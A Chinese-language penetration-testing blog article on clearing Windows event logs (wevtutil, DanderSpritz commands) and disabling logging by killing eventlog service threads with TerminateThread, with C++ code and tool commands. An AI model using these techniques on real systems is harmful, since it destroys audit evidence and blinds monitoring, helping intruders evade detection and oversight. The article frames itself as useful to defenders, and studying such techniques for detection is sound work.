导语:对于一次完整的渗透测试,通常会选择对Windows日志进行清除和绕过,而对于防御者来说,了解常用的绕过方法也有助于更好的保护自己的系统。

0x00 前言

在渗透测试过程中,Windows日志往往会记录系统上的敏感操作,如添加用户,远程登录执行等。

对于一次完整的渗透测试,通常会选择对Windows日志进行清除和绕过,而对于防御者来说,了解常用的绕过方法也有助于更好的保护自己的系统。

所以本文将要介绍常见的Windows日志清除与绕过方法,分享经验,帮助大家。

0x01 简介

本文将要介绍以下内容:

Windows日志的常用清除方法

Windows日志的两种绕过方法

0x02 Windows日志

Windows日志包括五个类别:

应用程序
安全
Setup
系统
转发事件

查看方式:

1、通过面板

位置如下:

Control PanelSystem and Security-View event logs-Windows Logs

如下图

1.png

2、通过Powershell

常用命令如下:

(管理员权限)

查看所有日志:

Get-WinEvent

查看应用程序类别下的日志:

Get-WinEvent -FilterHashtable @{logname="Application";}

0x03 Windows日志的常用清除方法

1、wevtutil.exe

操作系统默认包含,支持系统:Win7及以上

常用命令如下:

(1) 统计日志列表,查询所有日志信息,包含时间,数目

wevtutil.exe gli Application

操作如下图

11.png

(2) 查看指定类别的日志内容

wevtutil qe /f:text Application

操作如下图

111.png

(3) 删除该类日志所有内容

wevtutil cl Application

操作如下图

1111.png

Application日志全部清除,数目为0

(4) 删除单条内容

尚不支持

2、NSA DanderSpiritz

DanderSpritz是NSA的一款界面化的远控工具

相关介绍可参考:

https://3gstudent.github.io/3gstudent.github.io/NSA-DanderSpiritz%E6%B5%8B%E8%AF%95%E6%8C%87%E5%8D%97-%E6%9C%A8%E9%A9%AC%E7%94%9F%E6%88%90%E4%B8%8E%E6%B5%8B%E8%AF%95/

常用命令如下:

(1) 统计日志列表,查询所有日志信息,包含时间,数目

eventlogquery -log Application

(2) 查看指定类别的日志内容

eventlogfilter -log Application -num 10

(3) 删除该类日志所有内容

eventlogclear -log Application

(4) 删除单条内容

eventlogedit -log Application -record 1

注:

record序号可通过eventlogfilter获得

0x04 Windows日志的绕过方法

本文介绍的思路参考自Halil [email protected]的文章,地址如下:

https://artofpwn.com/phant0m-killing-windows-event-log.html

绕过原理:

Windows日志对应于eventlog服务,找到该服务对应的进程svchost.exe,进而筛选出svchost.exe进程中具体实现日志功能的线程,调用TerminateThread结束线程,破坏日志记录功能

特别的地方:

由于只结束了实现日志功能的线程,所以Windows Event Log服务没有被破坏,状态仍为正在运行

绕过方法一

1、定位eventlog服务对应进程svchost.exe的pid

2、遍历该进程中的所有线程

3、判断线程是否满足条件

Windows Event Log 服务需要调用wevtsvc.dll,完整路径为%WinDir%System32wevtsvc.dll

并且,如果线程调用了wevtsvc.dll,就可以判读该线程实现了日志记录功能

4、结束线程

使用TerminateThread

注:

Halil [email protected]使用powershell实现了方法一,完整代码可参考:

https://github.com/hlldz/Invoke-Phant0m

powershell脚本执行后,Windows日志功能失效,无法记录日志,操作如下图

2.png

5、恢复方法

结束进程svchost.exe

重新开启Windows Event Log 服务:

net start eventlog

操作如下图

22.png

绕过方法二

1、定位eventlog服务对应进程svchost.exe的pid

powershell代码如下:

Get-WmiObject -Class win32_service -Filter "name = 'eventlog'" | select -exp ProcessId

找到svchost.exe的pid为7008,如下图

222.png

2、遍历该进程中的所有线程

使用PsList

pslist下载地址如下:

https://technet.microsoft.com/en-us/sysinternals/bb896682.aspx

具体参数如下:

pslist.exe /accepteula -d 7008

获取进程svchost.exe中的所有线程,如下图

2222.png

3、判断线程是否满足条件

获取线程对应的服务,如果为eventlog,则满足条件

使用工具:ScTagQuery

下载地址:

http://www.winsiderss.com/tools/sctagquery/sctagqry.zip

具体参数如下:

sctagqry.exe -t 7928

根据返回的结果Service Tag,判断线程对应的服务

找到对应eventlog的线程,如下图

3.png

线程8136符合条件,依次尝试,直到获取所有符合条件线程

注:

使用Process Explorer可以简化此过程

找到eventlog服务对应进程svchost.exe

如下图

1498790162661404.png

右键查看属性,选择Threads标签,查看线程,可直接获得线程对应的服务

如下图

333.png

符合条件的线程TID为:

8136
8052
6708
2316
6356

4、结束线程

调用TerminateThread

通过c++实现,部分代码如下:

int main(int argc, char* argv[])
{   
    printf("TerminateThread TID:n");       
    for(int i=1;i<argc;i++)
    {   
        printf("%sn",argv[i]);
        HANDLE hThread = OpenThread(0x0001, FALSE,atoi(argv[i]));
        if(TerminateThread(hThread,0)==0)
            printf("[!] TerminateThread Error, TID: %s n",argv[i]);
        CloseHandle(hThread);
    }  
    return 0;
}

完整代码已上传至github,地址如下:

https://github.com/3gstudent/Windwos-EventLog-Bypass/blob/master/TerminateEventLogThread.cpp

控制台支持传入多个参数,向其传入5个TID: 8136 8052 6708 2316 6356

自动结束对应线程,日志功能失效

具体操作如下图

3333.png

注:

稍后我会在github上更新该绕过方法的完整实现代码,地址如下:

https://github.com/3gstudent/Windwos-EventLog-Bypass

0x05 补充

1、安装sysmon可对Windows日志功能进行扩展

相关介绍和绕过思路可参考;

https://3gstudent.github.io/3gstudent.github.io/%E9%80%9A%E8%BF%87APC%E5%AE%9E%E7%8E%B0Dll%E6%B3%A8%E5%85%A5-%E7%BB%95%E8%BF%87Sysmon%E7%9B%91%E6%8E%A7/

2、绕过方法仅针对Windows日志

对应用程序和服务日志失效,例如Windows Powershell

如下图

4.png

0x06 小结

本文对Windows日志的清除和绕过方法做了介绍,希望能够帮助大家,接下来会分享绕过方法二的具体程序实现方法。

源链接

Hacking more

...